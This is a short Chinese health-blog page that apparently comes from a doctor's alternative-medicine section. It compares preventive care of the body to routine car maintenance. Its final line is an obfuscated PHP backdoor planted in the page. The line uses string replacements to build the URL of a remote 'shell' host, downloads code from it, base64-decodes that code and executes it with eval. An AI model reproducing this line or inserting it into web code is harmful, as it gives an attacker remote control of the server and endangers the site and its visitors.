收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 為何預防比治療耗時耗力?
為何預防比治療耗時耗力? 列印 E-mail
        一般而言,新車只要里程數到了,車子就需要更換機油、剎車皮、輪胎…做做保養,很少人會等到車子壞掉,才來做修理的動作。舊車更應提前更換尚未壞掉的零件,並做正常里程的保養,以避免車子拋錨;因此,車子在保養上花費的金錢,一定比修理所花費的金錢大上許多。

        現在大家對自己身體的照顧,遠不及對車子的愛護。通常大家都等到身體病了,才去求醫就診,並不注重平時身體的保養;這樣就好像平常不保養車子,等車子壞了才去修理一樣。您,會這樣對待您的愛車嗎?
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));